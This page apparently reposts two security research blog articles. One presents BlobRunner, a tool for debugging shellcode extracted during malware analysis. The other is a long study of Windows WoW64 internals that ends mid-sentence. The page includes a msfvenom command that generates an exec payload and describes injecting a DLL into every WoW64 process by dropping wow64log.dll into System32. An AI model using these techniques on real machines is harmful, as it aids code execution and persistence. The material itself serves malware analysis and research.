BlobRunner — Quickly Debug Shellcode Extracted During Malware Analysis

( Original text by LYDECKER BLACK )

BlobRunner is a simple tool to quickly debug shellcode extracted during malware analysis.
BlobRunner allocates memory for the target file and jumps to the base (or offset) of the allocated memory. This allows an analyst to quickly debug into extracted artifacts with minimal overhead and effort.

 

To use BlobRunner, you can download the compiled executable from the releases page or build your own using the steps below.
Building
Building the executable is straight forward and relatively painless.
Requirements

  • Download and install Microsoft Visual C++ Build Tools or Visual Studio

Build Steps

  • Open Visual Studio Command Prompt
  • Navigate to the directory where BlobRunner is checked out
  • Build the executable by running:
cl blobrunner.c

Building BlobRunner x64
Building the x64 version is virtually the same as above, but simply uses the x64 tooling.

  • Open x64 Visual Studio Command Prompt
  • Navigate to the directory where BlobRunner is checked out
  • Build the executable by running:
 cl /Feblobrunner64.exe /Foblobrunner64.out blobrunner.c

Usage
To debug:

  • Open BlobRunner in your favorite debugger.
  • Pass the shellcode file as the first parameter.
  • Add a breakpoint before the jump into the shellcode
  • Step into the shellcode
BlobRunner.exe shellcode.bin

Debug into file at a specific offset.

BlobRunner.exe shellcode.bin --offset 0x0100

Debug into file and don’t pause before the jump. Warning: Ensure you have a breakpoint set before the jump.

BlobRunner.exe shellcode.bin --nopause

Debugging x64 Shellcode
Inline assembly isn’t supported by the x64 compiler, so to support debugging into x64 shellcode the loader creates a suspended thread which allows you to place a breakpoint at the thread entry, before the thread is resumed.

Remote Debugging Shell Blobs (IDAPro)
The process is virtually identical to debugging shellcode locally — with the exception that the you need to copy the shellcode file to the remote system. If the file is copied to the same path you are running win32_remote.exe from, you just need to use the file name for the parameter. Otherwise, you will need to specify the path to the shellcode file on the remote system.

Shellcode Samples
You can quickly generate shellcode samples using the Metasploit tool msfvenom.
Generating a simple Windows exec payload.

msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -o test2.bin

Feedback / Help

  • Any questions, comments or requests you can find us on twitter: @seanmw or @herrcore
  • Pull requests welcome!
Реклама

WoW64 internals …re-discovering Heaven’s Gate on ARM

( Original text by PetrBenes )

WoW64 — aka Windows (32-bit) on Windows (64-bit) — is a subsystem that enables 32-bit Windows applications to run on 64-bit Windows. Most people today are familiar with WoW64 on Windows x64, where they can run x86 applications. WoW64 has been with us since Windows XP, and x64 wasn’t the only architecture where WoW64 has been available — it was available on IA-64architecture as well, where WoW64 has been responsible for emulating x86. Newly, WoW64 is also available on ARM64, enabling emulation of both x86 and ARM32 appllications.

MSDN offers brief article on WoW64 implementation details. We can find that WoW64 consists of (ignoring IA-64):

  • Translation support DLLs:
    • wow64.dll: translation of Nt* system calls (ntoskrnl.exe / ntdll.dll)
    • wow64win.dll: translation of NtGdi*NtUser* and other GUI-related system calls (win32k.sys / win32u.dll)
  • Emulation support DLLs:
    • wow64cpu.dll: support for running x86 programs on x64
    • wowarmhw.dll: support for running ARM32 programs on ARM64
    • xtajit.dll: support for running x86 programs on ARM64

Besides Nt* system call translation, the wow64.dll provides the core emulation infrastructure.

If you have previous experience with reversing WoW64 on x64, you can notice that it shares plenty of common code with WoW64 subsystem on ARM64. Especially if you peeked into WoW64 of recent x64 Windows, you may have noticed that it actually contains strings such as SysArm32 and that some functions check against IMAGE_FILE_MACHINE_ARMNT (0x1C4) machine type:

Wow64SelectSystem32PathInternal
Wow64SelectSystem32PathInternal found in wow64.dll on Windows x64
Wow64ArchGetSP
Wow64ArchGetSP found in wow64.dll on Windows x64

WoW on x64 systems cannot emulate ARM32 though — it just apparently shares common code. But SysX8664 and SysArm64 sound particularly interesting!

Those similarities can help anyone who is fluent in x86/x64, but not that much in ARM. Also, HexRays decompiler produce much better output for x86/x64 than for ARM32/ARM64.

Initially, my purpose with this blogpost was to get you familiar with how WoW64 works for ARM32 programs on ARM64. But because WoW64 itself changed a lot with Windows 10, and because WoW64 shares some similarities between x64 and ARM64, I decided to briefly get you through how WoW64 works in general.

Everything presented in this article is based on Windows 10 — insider preview, build 18247.

Terms

Througout this article I’ll be using some terms I’d like to explain beforehand:

  • ntdll or ntdll.dll — these will be always refering to the native ntdll.dll (x64 on Windows x64, ARM64 on Windows ARM64, …), until said otherwise or until the context wouldn’t indicate otherwise.
  • ntdll32 or ntdll32.dll — to make an easy distinction between native and WoW64 ntdll.dllany WoW64 ntdll.dll will be refered with the *32 suffix.
  • emu or emu.dll — these will represent any of the emulation support DLLs (one of wow64cpu.dll,wowarmhw.dllxtajit.dll)
  • module!FunctionName — refers to a symbol FunctionName within the module. If you’re familiar with WinDbg, you’re already familiar with this notation.
  • CHPE — “compiled-hybrid-PE”, a new type of PE file, which looks as if it was x86 PE file, but has ARM64 code within them. CHPE will be tackled in more detail in the x86 on ARM64 section.
  • The terms emulation and binary-translation refer to the WoW64 workings and they may be used interchangeably.

Kernel

This section shows some points of interest in the ntoskrnl.exe regarding to the WoW64 initialization. If you’re interested only in the user-mode part of the WoW64, you can skip this part to the Initialization of the WoW64 process.

Kernel (initialization)

Initalization of WoW64 begins with the initialization of the kernel:

  • nt!KiSystemStartup
  • nt!KiInitializeKernel
  • nt!InitBootProcessor
  • nt!PspInitPhase0
  • nt!Phase1Initialization
    • nt!IoInitSystem
      • nt!IoInitSystemPreDrivers
      • nt!PsLocateSystemDlls

nt!PsLocateSystemDlls routine takes a pointer named nt!PspSystemDlls, and then calls nt!PspLocateSystemDll in a loop. Let’s figure out what’s going on here:

PspSystemDlls (x64)
PspSystemDlls (x64)
PspSystemDlls (ARM64)
PspSystemDlls (ARM64)

nt!PspSystemDlls appears to be array of pointers to some structure, which holds some NTDLL-related data. The order of these NTDLLs corresponds with this enum (included in the PDB):

typedef enum _SYSTEM_DLL_TYPE
{
PsNativeSystemDll = 0,
PsWowX86SystemDll = 1,
PsWowArm32SystemDll = 2,
PsWowAmd64SystemDll = 3,
PsWowChpeX86SystemDll = 4,
PsVsmEnclaveRuntimeDll = 5,
PsSystemDllTotalTypes = 6,
} SYSTEM_DLL_TYPE;
view rawSYSTEM_DLL_TYPE.h hosted with ❤ by GitHub

Remember this enum, we’ll be needing it again in a while.

Now, let’s look how such structure looks like:

SystemDllData (x64)
SystemDllData (x64)
SystemDllData (ARM64)
SystemDllData (ARM64)

The nt!PspLocateSystemDll function intializes fields of this structure. The layout of this structure isn’t unfortunatelly in the PDB, but you can find a reconstructed version in the appendix.

Now let’s get back to the nt!Phase1Initialization — there’s more:

  • ...
  • nt!Phase1Initialization
    • nt!Phase1InitializationIoReady
      • nt!PspInitPhase2
      • nt!PspInitializeSystemDlls

nt!PspInitializeSystemDlls routine takes a pointer named nt!NtdllExportInformation. Let’s look at it:

NtdllExportInformation (x64)
NtdllExportInformation (x64)
NtdllExportInformation (ARM64)
NtdllExportInformation (ARM64)

It looks like it’s some sort of array, again, ordered by the enum _SYSTEM_DLL_TYPE mentioned earlier. Let’s examine NtdllExports:

NtdllExportInformation (x64)
NtdllExportInformation (x64)

Nothing unexpected — just tuples of function name and function pointer. Did you notice the difference in the number after the NtdllExports field? On x64 there is 19 meanwhile on ARM64 there is 14. This number represents number of items in NtdllExports — and indeed, there is slightly different set of them:

x64 ARM64
(0) LdrInitializeThunk (0) LdrInitializeThunk
(1) RtlUserThreadStart (1) RtlUserThreadStart
(2) KiUserExceptionDispatcher (2) KiUserExceptionDispatcher
(3) KiUserApcDispatcher (3) KiUserApcDispatcher
(4) KiUserCallbackDispatcher (4) KiUserCallbackDispatcher
(5) KiUserCallbackDispatcherReturn
(5) KiRaiseUserExceptionDispatcher (6) KiRaiseUserExceptionDispatcher
(6) RtlpExecuteUmsThread
(7) RtlpUmsThreadYield
(8) RtlpUmsExecuteYieldThreadEnd
(9) ExpInterlockedPopEntrySListEnd (7) ExpInterlockedPopEntrySListEnd
(10) ExpInterlockedPopEntrySListFault (8) ExpInterlockedPopEntrySListFault
(11) ExpInterlockedPopEntrySListResume (9) ExpInterlockedPopEntrySListResume
(12) LdrSystemDllInitBlock (10) LdrSystemDllInitBlock
(13) RtlpFreezeTimeBias (11) RtlpFreezeTimeBias
(14) KiUserInvertedFunctionTable (12) KiUserInvertedFunctionTable
(15) WerReportExceptionWorker (13) WerReportExceptionWorker
(16) RtlCallEnclaveReturn
(17) RtlEnclaveCallDispatch
(18) RtlEnclaveCallDispatchReturn

We can see that ARM64 is missing Ums (User-Mode Scheduling) and Enclave functions. Also, we can see that ARM64 has one extra function: KiUserCallbackDispatcherReturn.

On the other hand, all NtdllWow*Exports contain the same set of function names:

NtdllWowExports (ARM64)
NtdllWowExports (ARM64)

Notice names of second fields of these “structures”: PsWowX86SharedInformation,PsWowChpeX86SharedInformation, … If we look at the address of those fields, we can see that they’re part of another array:

PsWowX86SharedInformation (ARM64)
PsWowX86SharedInformation (ARM64)

Those addresses are actually targets of the pointers in the NtdllWow*Exports structure. Also, those functions combined with PsWow*SharedInformation might give you hint that they’re related to this enum (included in the PDB):

typedef enum _WOW64_SHARED_INFORMATION
{
SharedNtdll32LdrInitializeThunk = 0,
SharedNtdll32KiUserExceptionDispatcher = 1,
SharedNtdll32KiUserApcDispatcher = 2,
SharedNtdll32KiUserCallbackDispatcher = 3,
SharedNtdll32RtlUserThreadStart = 4,
SharedNtdll32pQueryProcessDebugInformationRemote = 5,
SharedNtdll32BaseAddress = 6,
SharedNtdll32LdrSystemDllInitBlock = 7,
SharedNtdll32RtlpFreezeTimeBias = 8,
Wow64SharedPageEntriesCount = 9,
} WOW64_SHARED_INFORMATION;

Notice how the order of the SharedNtdll32BaseAddress corellates with the empty field in the previous screenshot (highlighted). The set of WoW64 NTDLL functions is same on both x64 and ARM64.

(The C representation of this data can be found in the appendix.)

Now we can tell what the nt!PspInitializeSystemDlls function does — it gets image base of each NTDLL (nt!PsQuerySystemDllInfo), resolves all Ntdll*Exports for them (nt!RtlFindExportedRoutineByName). Also, only for all WoW64 NTDLLs (if ((SYSTEM_DLL_TYPE)SystemDllType > PsNativeSystemDll)) it assigns the image base to the SharedNtdll32BaseAddress field of the PsWow*SharedInformation array (nt!PspWow64GetSharedInformation).

Kernel (create process)

Let’s talk briefly about process creation. As you probably already know, the native ntdll.dll is mapped as a first DLL into each created process. This applies for all architectures — x86x64 and also for ARM64. The WoW64 processes aren’t exception to this rule — the WoW64 processes share the same initialization code path as native processes.

  • nt!NtCreateUserProcess
  • nt!PspAllocateProcess
    • nt!PspSetupUserProcessAddressSpace
      • nt!PspPrepareSystemDllInitBlock
      • nt!PspWow64SetupUserProcessAddressSpace
  • nt!PspAllocateThread
    • nt!PspWow64InitThread
    • nt!KeInitThread // Entry-point: nt!PspUserThreadStartup
  • nt!PspUserThreadStartup
  • nt!PspInitializeThunkContext
    • nt!KiDispatchException

If you ever wondered how is the first user-mode instruction of the newly created process executed, now you know the answer — a “synthetic” user-mode exception is dispatched, with ExceptionRecord.ExceptionAddress = &PspLoaderInitRoutine, where PspLoaderInitRoutinepoints to the ntdll!LdrInitializeThunk. This is the first function that is executed in every process — including WoW64 processes.

Initialization of the WoW64 process

The fun part begins!

NOTE: Initialization of the wow64.dll is same on both x64 and ARM64. Eventual differences will be mentioned.

  • ntdll!LdrInitializeThunk
  • ntdll!LdrpInitialize
  • ntdll!_LdrpInitialize
  • ntdll!LdrpInitializeProcess
  • ntdll!LdrpLoadWow64

The ntdll!LdrpLoadWow64 function is called when the ntdll!UseWOW64 global variable is TRUE, which is set when NtCurrentTeb()->WowTebOffset != NULL.

It constructs the full path to the wow64.dll, loads it, and then resolves following functions:

  • Wow64LdrpInitialize
  • Wow64PrepareForException
  • Wow64ApcRoutine
  • Wow64PrepareForDebuggerAttach
  • Wow64SuspendLocalThread

NOTE: The resolution of these pointers is wrapped between pair of ntdll!LdrProtectMrdata calls, responsible for protecting (1) and unprotecting (0) the .mrdata section — in which these pointers reside. MRDATA (Mutable Read Only Data) are part of the CFG (Control-Flow Guard) functionality. You can look at Alex’s slides for more information.

When these functions are successfully located, the ntdll.dll finally transfers control to the wow64.dll by calling wow64!Wow64LdrpInitialize. Let’s go through the sequence of calls that eventually bring us to the entry-point of the “emulated” application.

  • wow64!Wow64LdrpInitialize
    • wow64!Wow64InfoPtr = (NtCurrentPeb32() + 1)
    • NtCurrentTeb()->TlsSlots[/* 10 */ WOW64_TLS_WOW64INFO] = wow64!Wow64InfoPtr
    • ntdll!RtlWow64GetCpuAreaInfo
    • wow64!ProcessInit
    • wow64!CpuNotifyMapViewOfSection // Process image
    • wow64!Wow64DetectMachineTypeInternal
    • wow64!Wow64SelectSystem32PathInternal
    • wow64!CpuNotifyMapViewOfSection // 32-bit NTDLL image
    • wow64!ThreadInit
    • wow64!ThunkStartupContext64TO32
    • wow64!Wow64SetupInitialCall
    • wow64!RunCpuSimulation
      • emu!BTCpuSimulate

Wow64InfoPtr is the first initialized variable in the wow64.dll. It contains data shared between 32-bit and 64-bit execution mode and its structure is not documented, although you can find this structure partialy restored in the appendix.

RtlWow64GetCpuAreaInfo is an internal ntdll.dll function which is called a lot during emulation. It is mainly used for fetching the machine type and architecture-specific CPU context (the CONTEXTstructure) of the emulated process. This information is fetched into an undocumented structure, which we’ll be calling WOW64_CPU_AREA_INFO. Pointer to this structure is then given to the ProcessInit function.

Wow64DetectMachineTypeInternal determines the machine type of the executed process and returns it. Wow64SelectSystem32PathInternal selects the “emulated” System32 directory based on that machine type, e.g. SysWOW64 for x86 processes or SysArm32 for ARM32 processes.

You can also notice calls to CpuNotifyMapViewOfSection function. As the name suggests, it is also called on each “emulated” call of NtMapViewOfSection. This function:

  • Checks if the mapped image is executable
  • Checks if following conditions are true:
    • NtHeaders->OptionalHeader.MajorSubsystemVersion == USER_SHARED_DATA.NtMajorVersion
    • NtHeaders->OptionalHeader.MinorSubsystemVersion == USER_SHARED_DATA.NtMinorVersion

If these checks pass, CpupResolveReverseImports function is called. This function checks if the mapped image exports the Wow64Transition symbol and if so, it assigns there a 32-bit pointer value returned by emu!BTCpuGetBopCode.

The Wow64Transition is mostly known to be exported by SysWOW64\ntdll.dll, but there are actually multiple of Windows’ WoW DLLs which exports this symbol (will be mentioned later). You might be already familiar with the term “Heaven’s Gate” — this is where the Wow64Transition will point to on Windows x64 — a simple far jump instruction which switches into long-mode (64-bit) enabled code segment. On ARM64, the Wow64Transition points to a “nop” function.

NOTE: Because there are no checks on the ImageName, the Wow64Transition symbol is resolved for all executable images that passes the checks mentioned earlier. If you’re wondering whether Wow64Transition would be resolved for your custom executable or DLL — it indeed would!

The initialization then continues with thread-specific initialization by calling ThreadInit. This is followed by pair of calls ThunkStartupContext64TO32(CpuArea.MachineType, CpuArea.Context, NativeContext) and Wow64SetupInitialCall(&CpuArea) — these functions perform the necessary setup of the architecture-specific WoW64 CONTEXT structure to prepare start of the execution in the emulated environment. This is done in the exact same way as if ntoskrnl.exe would actually executed the emulated application — i.e.:

  • setting the instruction pointer to the address of ntdll32!LdrInitializeThunk
  • setting the stack pointer below the WoW64 CONTEXT structure
  • setting the 1st parameter to point to that CONTEXT structure
  • setting the 2nd parameter to point to the base address of the ntdll32

Finally, the RunCpuSimulation function is called. This function just calls BTCpuSimulate from the binary-translator DLL, which contains the actual emulation loop that never returns.

wow64!ProcessInit

  • wow64!Wow64ProtectMrdata // 0
  • wow64!Wow64pLoadLogDll
    • ntdll!LdrLoadDll // "%SystemRoot%\system32\wow64log.dll"

wow64.dll has also it’s own .mrdata section and ProcessInit begins with unprotecting it. It then tries to load the wow64log.dll from the constructed system directory. Note that this DLL is never present in any released Windows installation (it’s probably used internally by Microsoft for debugging of the WoW64 subsystem). Therefore, load of this DLL will normally fail. This isn’t problem, though, because no critical functionality of the WoW64 subsystem depends on it. If the load would actually succeed, the wow64.dll would try to find following exported functions there:

  • Wow64LogInitialize
  • Wow64LogSystemService
  • Wow64LogMessageArgList
  • Wow64LogTerminate

If any of these functions wouldn’t be exported, the DLL would be immediately unloaded.

If we’d drop custom wow64log.dll (which would export functions mentioned above) into the %SystemRoot%\System32 directory, it would actually get loaded into every WoW64 process. This way we could drop a custom logging DLL, or even inject every WoW64 process with native DLL!

For more details, you can check my injdrv project which implements injection of native DLLs into WoW64 processes, or check this post by Walied Assar.

Then, certain important values are fetched from the LdrSystemDllInitBlock array. These contains base address of the ntdll32.dll, pointer to functions like ntdll32!KiUserExceptionDispatcherntdll32!KiUserApcDispatcher, …, control flow guard information and others.

Finally, the Wow64pInitializeFilePathRedirection is called, which — as the name suggests — initializes WoW64 path redirection. The path redirection is completely implemented in the wow64.dll and the mechanism is basically based on string replacement. The path redirection can be disabled and enabled by calling kernel32!Wow64DisableWow64FsRedirection & kernel32!Wow64RevertWow64FsRedirection function pairs. Both of these functions internally call ntdll32!RtlWow64EnableFsRedirectionEx, which directly operates on NtCurrentTeb()->TlsSlots[/* 8 */ WOW64_TLS_FILESYSREDIR] field.

wow64!ServiceTables

Next, a ServiceTables array is initialized. You might be already familiar with the KSERVICE_TABLE_DESCRIPTOR from the ntoskrnl.exe, which contains — among other things — a pointer to an array of system functions callable from the user-mode. ntoskrnl.exe contains 2 of these tables: one for ntoskrnl.exe itself and one for the win32k.sys, aka the Windows (GUI) subsystem. wow64.dll has 4 of them!

The WOW64_SERVICE_TABLE_DESCRIPTOR has the exact same structure as the KSERVICE_TABLE_DESCRIPTOR, except that it is extended:

typedef struct _WOW64_ERROR_CASE {
ULONG Case;
NTSTATUS TransformedStatus;
} WOW64_ERROR_CASE, *PWOW64_ERROR_CASE;
typedef struct _WOW64_SERVICE_TABLE_DESCRIPTOR {
KSERVICE_TABLE_DESCRIPTOR Descriptor;
WOW64_ERROR_CASE ErrorCaseDefault;
PWOW64_ERROR_CASE ErrorCase;
} WOW64_SERVICE_TABLE_DESCRIPTOR, *PWOW64_SERVICE_TABLE_DESCRIPTOR;

(More detailed definition of this structure is in the appendix.)

ServiceTables array is populated as follows:

  • ServiceTables[/* 0 */ WOW64_NTDLL_SERVICE_INDEX] = sdwhnt32
  • ServiceTables[/* 1 */ WOW64_WIN32U_SERVICE_INDEX] = wow64win!sdwhwin32
  • ServiceTables[/* 2 */ WOW64_KERNEL32_SERVICE_INDEX = wow64win!sdwhcon
  • ServiceTables[/* 3 */ WOW64_USER32_SERVICE_INDEX] = sdwhbase

NOTE: wow64.dll directly depends (by import table) on two DLLs: the native ntdll.dll and wow64win.dll. This means that wow64win.dll is loaded even into “non-Windows-subsystem” processes, that wouldn’t normally load user32.dll.

These two symbols mentioned above are the only symbols that wow64.dll requires wow64win.dll to export.

Let’s have a look at sdwhnt32 service table:

sdwhnt32 (x64)
sdwhnt32 (x64)
sdwhnt32JumpTable (x64)
sdwhnt32JumpTable (x64)
sdwhnt32Number (x64)
sdwhnt32Number (x64)

There is nothing surprising for those who already dealt with service tables in ntoskrnl.exe.sdwhnt32JumpTable contains array of the system call functions, which are traditionaly prefixed. WoW64 “system calls” are prefixed with wh*, which honestly I don’t have any idea what it stands for — although it might be the case as with Zw* prefix — it stands for nothing and is simply used as an unique distinguisher.

The job of these wh* functions is to correctly convert any arguments and return values from the 32-bit version to the native, 64-bit version. Keep in mind that that it not only includes conversion of integers and pointers, but also content of the structures. Interesting note might be that each of the wh* functions has only one argument, which is pointer to an array of 32-bit values. This array contains the parameters passed to the 32-bit system call.

As you could notice, in those 4 service tables there are “system calls” that are not present in the ntoskrnl.exe. Also, I mentioned earlier that the Wow64Transition is resolved in multiple DLLs. Currently, these DLLs export this symbol:

  • ntdll.dll
  • win32u.dll
  • kernel32.dll and kernelbase.dll
  • user32.dll

The ntdll.dll and win32u.dll are obvious and they represent the same thing as their native counterparts. The service tables used by kernel32.dll and user32.dll contain functions for transformation of particular csrss.exe calls into their 64-bit version.

It’s also worth noting that at the end of the ntdll.dll system table, there are several functions with NtWow64* calls, such as NtWow64ReadVirtualMemory64NtWow64WriteVirtualMemory64 and others. These are special functions which are provided only to WoW64 processes.

One of these special functions is also NtWow64CallFunction64. It has it’s own small dispatch table and callers can select which function should be called based on its index:

Wow64FunctionDispatch64 (x64)
Wow64FunctionDispatch64 (x64)

NOTE: I’ll be talking about one of these functions — namely Wow64CallFunctionTurboThunkControl — later in the Disabling Turbo thunks section.

wow64!Wow64SystemServiceEx

This function is similar to the kernel’s nt!KiSystemCall64 — it does the dispatching of the system call. This function is exported by the wow64.dll and imported by the emulation DLLs. Wow64SystemServiceEx accepts 2 arguments:

  • The system call number
  • Pointer to an array of 32-bit arguments passed to the system call (as mentioned earlier)

The system call number isn’t just an index, but also contains index of a system table which needs to be selected (this is also true for ntoskrnl.exe):

typedef struct _WOW64_SYSTEM_SERVICE
{
USHORT SystemCallNumber : 12;
USHORT ServiceTableIndex : 4;
} WOW64_SYSTEM_SERVICE, *PWOW64_SYSTEM_SERVICE;

This function then selects ServiceTables[ServiceTableIndex] and calls the appropriate wh*function based on the SystemCallNumber.

Wow64SystemServiceEx (x64)
Wow64SystemServiceEx (x64)

NOTE: In case the wow64log.dll has been successfully loaded, the Wow64SystemServiceEx function calls Wow64LogSystemServiceWrapper (wrapper around wow64log!Wow64LogSystemService function): once before the actual system call and one immediately after. This can be used for instrumentation of each WoW64 system call! The structure passed to Wow64LogSystemService contains every important information about the system call — it’s table index, system call number, the argument list and on the second call, even the resulting NTSTATUS! You can find layout of this structure in the appendix(WOW64_LOG_SERVICE).

Finally, as have been mentioned, the WOW64_SERVICE_TABLE_DESCRIPTOR structure differs from KSERVICE_TABLE_DESCRIPTOR in that it contains ErrorCase table. The code mentioned above is actually wrapped in a SEH __try/__except block. If whService raise an exception, the __exceptblock calls Wow64HandleSystemServiceError function. The function looks if the corresponding service table which raised the exception has non-NULL ErrorCase and if it does, it selects the appropriate WOW64_ERROR_CASE for the system call. If the ErrorCase is NULL, the values from ErrorCaseDefault are used. The NTSTATUS of the exception is then transformed according to an algorithm which can be found in the appendix.

wow64!ProcessInit (cont.)

  • ...
  • wow64!CpuLoadBinaryTranslator // MachineType
    • wow64!CpuGetBinaryTranslatorPath // MachineType
      • ntdll!NtOpenKey // "\Registry\Machine\Software\Microsoft\Wow64\"
      • ntdll!NtQueryValueKey // "arm" / "x86"
      • ntdll!RtlGetNtSystemRoot // "arm" / "x86"
      • ntdll!RtlUnicodeStringPrintf // "%ws\system32\%ws"

As you’ve probably guessed, this function constructs path to the binary-translator DLL, which is — on x64 — known as wow64cpu.dll. This DLL will be responsible for the actual low-level emulation.

\Registry\Machine\Software\Microsoft\Wow64\x86 (x64)
\Registry\Machine\Software\Microsoft\Wow64\x86 (x64)
\Registry\Machine\Software\Microsoft\Wow64\arm (ARM64)
\Registry\Machine\Software\Microsoft\Wow64\arm (ARM64)
\Registry\Machine\Software\Microsoft\Wow64\x86 (ARM64)
\Registry\Machine\Software\Microsoft\Wow64\x86 (ARM64)

We can see that there is no wow64cpu.dll on ARM64. Instead, there is xtajit.dll used for x86 emulation and wowarmhw.dll used for ARM32 emulation.

NOTE: The CpuGetBinaryTranslatorPath function is same on both x64 and ARM64 except for one peculiar difference: on Windows x64, if the \Registry\Machine\Software\Microsoft\Wow64\x86 key cannot be opened (is missing/was deleted), the function contains a fallback to load wow64cpu.dll. On Windows ARM64, though, it doesn’t have such fallback and if the registry key is missing, the function fails and the WoW64 process is terminated.

wow64.dll then loads one of the selected DLL and tries to find there following exported functions:

BTCpuProcessInit (!) BTCpuProcessTerm
BTCpuThreadInit BTCpuThreadTerm
BTCpuSimulate (!) BTCpuResetFloatingPoint
BTCpuResetToConsistentState BTCpuNotifyDllLoad
BTCpuNotifyDllUnload BTCpuPrepareForDebuggerAttach
BTCpuNotifyBeforeFork BTCpuNotifyAfterFork
BTCpuNotifyAffinityChange BTCpuSuspendLocalThread
BTCpuIsProcessorFeaturePresent BTCpuGetBopCode (!)
BTCpuGetContext BTCpuSetContext
BTCpuTurboThunkControl BTCpuNotifyMemoryAlloc
BTCpuNotifyMemoryFree BTCpuNotifyMemoryProtect
BTCpuFlushInstructionCache2 BTCpuNotifyMapViewOfSection
BTCpuNotifyUnmapViewOfSection BTCpuUpdateProcessorInformation
BTCpuNotifyReadFile BTCpuCfgDispatchControl
BTCpuUseChpeFile BTCpuOptimizeChpeImportThunks
BTCpuNotifyProcessExecuteFlagsChange BTCpuProcessDebugEvent
BTCpuFlushInstructionCacheHeavy

Interestingly, not all functions need to be found — only those marked with the “(!)”, the rest is optional. As a next step, the resolved BTCpuProcessInit function is called, which performs binary-translator-specific process initialization. We’ll cover that in later section.

At the end of the ProcessInit function, wow64!Wow64ProtectMrdata(1) is called, making .mrdatanon-writable again.

wow64!ThreadInit

  • wow64!ThreadInit
    • wow64!CpuThreadInit
      • NtCurrentTeb32()->WOW32Reserved = BTCpuGetBopCode()
      • emu!BTCpuThreadInit

ThreadInit does some little thread-specific initialization, such as:

  • Copying CurrentLocale and IdealProcessor values from 64-bit TEB into 32-bit TEB.
  • For non-WOW64_CPUFLAGS_SOFTWARE emulators, it calls CpuThreadInit, which:
    • Performs NtCurrentTeb32()->WOW32Reserved = BTCpuGetBopCode().
    • Calls emu!BTCpuThreadInit().
  • For WOW64_CPUFLAGS_SOFTWARE emulators, it creates an event, which added intoAlertByThreadIdEventHashTable and set to NtCurrentTeb()->TlsSlots[18]. This event is used for special emulation of NtAlertThreadByThreadId and NtWaitForAlertByThreadId.

NOTE: The WOW64_CPUFLAGS_MSFT64 (1) or the WOW64_CPUFLAGS_SOFTWARE (2) flag is stored in the NtCurrentTeb()->TlsSlots[/* 10 */ WOW64_TLS_WOW64INFO], in the WOW64INFO.CpuFlags field. One of these flags is always set in the emulator’s BTCpuProcessInit function (mentioned in the section above):

  • wow64cpu.dll sets WOW64_CPUFLAGS_MSFT64 (1)
  • wowarmhw.dll sets WOW64_CPUFLAGS_MSFT64 (1)
  • xtajit.dll sets WOW64_CPUFLAGS_SOFTWARE (2)

x86 on x64

Entering 32-bit mode

  • ...
  • wow64!RunCpuSimulation
    • wow64cpu!BTCpuSimulate
      • wow64cpu!RunSimulatedCode

RunSimulatedCode runs in a loop and performs transitions into 32-bit mode either via:

  • jmp fword ptr[reg] — a “far jump” that not only changes instruction pointer (RIP), but also the code segment register (CS). This segment usually being set to 0x23, while 64-bit code segment is 0x33
  • synthetic “machine frame” and iret — called on every “state reset”

NOTE: Explanation of segmentation and “why does it work just by changing a segment register” is beyond scope of this article. If you’d like to know more about “long mode” and segmentation, you can start here.

Far jump is used most of the time for the transition, mainly because it’s faster. iret on the other hand is more powerful, as it can change CSSSEFLAGSRSP and RIP all at once. The “state reset” occurs when WOW64_CPURESERVED.Flags has WOW64_CPURESERVED_FLAG_RESET_STATE (1) bit set. This happens during exception (see wow64!Wow64PrepareForException and wow64cpu!BTCpuResetToConsistentState). Also, this flag is cleared on every emulation loop (using btr — bit-test-and-reset).

Start of the RunSimulatedCode (x64)
Start of the RunSimulatedCode (x64)

You can see the simplest form of switching into the 32-bit mode. Also, at the beginning you can see that TurboThunkDispatch address is moved into the r15 register. This register stays untouched during the whole RunSimulatedCode function. Turbo thunks will be explained in more detail later.

Leaving 32-bit mode

The switch back to the 64-bit mode is very similar — it also uses far jumps. The usual situation when code wants to switch back to the 64-bit mode is upon system call:

NtMapViewOfSection (x64)
NtMapViewOfSection (x64)

The Wow64SystemServiceCall is just a simple jump to the Wow64Transition:

Wow64SystemServiceCall (x64)
Wow64SystemServiceCall (x64)

If you remember, the Wow64Transition value is resolved by the wow64cpu!BTCpuGetBopCodefunction:

BTCpuGetBopCode - wow64cpu.dll (x64)
BTCpuGetBopCode — wow64cpu.dll (x64)

It selects either KiFastSystemCall or KiFastSystemCall2 based on the CpupSystemCallFast value.

The KiFastSystemCall looks like this (used when CpupSystemCallFast != 0):

  • [x86] jmp 33h:$+9 (jumps to the instruction below)
  • [x64] jmp qword ptr [r15+offset] (which points to CpupReturnFromSimulatedCode)

The KiFastSystemCall2 looks like this (used when CpupSystemCallFast == 0):

  • [x86] push 0x33
  • [x86] push eax
  • [x86] call $+5
  • [x86] pop eax
  • [x86] add eax, 12
  • [x86] xchg eax, dword ptr [esp]
  • [x86] jmp fword ptr [esp] (jumps to the instruction below)
  • [x64] add rsp, 8
  • [x64] jmp wow64cpu!CpupReturnFromSimulatedCode

Clearly, the KiFastSystemCall is faster, so why it’s not used used every time?

It turns out, CpupSystemCallFast is set to 1 in the wow64cpu!BTCpuProcessInit function if the process is not executed with the ProhibitDynamicCode mitigation policy and if NtProtectVirtualMemory(&KiFastSystemCall, PAGE_READ_EXECUTE) succeeds.

This is because KiFastSystemCall is in a non-executable read-only section (W64SVC) whileKiFastSystemCall2 is in read-executable section (WOW64SVC).

But the actual reason why is KiFastSystemCall in non-executable section by default and needs to be set as executable manually is, honestly, unknown to me. My guess would be that it has something to do with relocations, because the address in the jmp 33h:$+9 instruction must be somehow resolved by the loader. But maybe I’m wrong. Let me know if you know the answer!

Turbo thunks

I hope you didn’t forget about the TurboThunkDispatch address hanging in the r15 register. This value is used as a jump-table:

TurboThunkDispatch (x64)
TurboThunkDispatch (x64)

There are 32 items in the jump-table.

TurboDispatchJumpAddressStart (x64)
TurboDispatchJumpAddressStart (x64)

CpupReturnFromSimulatedCode is the first code that is always executed in the 64-bit mode when 32-bit to 64-bit transition occurs. Let’s recapitulate the code:

  • Stack is swapped,
  • Non-volatile registers are saved
  • eax — which contains the encoded service table index and system call number — is moved into the ecx
  • it’s high-word is acquired via ecx >> 16.
  • the result is used as an index into the TurboThunkDispatch jump-table

You might be confused now, because few sections above we’ve defined the service number like this:

typedef struct _WOW64_SYSTEM_SERVICE
{
USHORT SystemCallNumber : 12;
USHORT ServiceTableIndex : 4;
} WOW64_SYSTEM_SERVICE, *PWOW64_SYSTEM_SERVICE;

…therefore, after right-shifting this value by 16 bits we should get always 0, right?

It turns out, on x64, the WOW64_SYSTEM_SERVICE might be defined like this:

